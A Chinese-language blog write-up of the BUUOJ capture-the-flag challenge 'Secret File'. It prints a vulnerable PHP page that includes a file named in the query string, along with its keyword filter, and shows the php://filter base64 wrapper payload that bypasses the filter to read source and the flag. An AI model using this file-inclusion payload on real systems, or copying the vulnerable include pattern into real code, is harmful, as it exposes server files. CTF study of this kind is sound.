BUUOJ [极客大挑战 2019]Secret File

时间：2020-04-15 00:49:47 阅读：72 评论：0 收藏：0 [点我收藏+]

[极客大挑战 2019]Secret File

0X01考点

php的file伪协议读取文件

?file=php://filter/convert.base64-encode/resource=

0X02解题过程

bp开启，有页面跳转，然后访问

/secr3t.php

出现了源代码

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET[‘file‘];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag

../目录穿越，等等都被过滤，维度没有过滤file读取

就直接用file伪协议读取就好了

技术分享图片

然后base64解密就ok了

0X03感想

还是要加油啊，争取每天四篇博客！

0X04参考博客

https://www.cnblogs.com/wangtanzhi/p/12184620.html

BUUOJ [极客大挑战 2019]Secret File

原文：https://www.cnblogs.com/JeffKing11/p/12702276.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)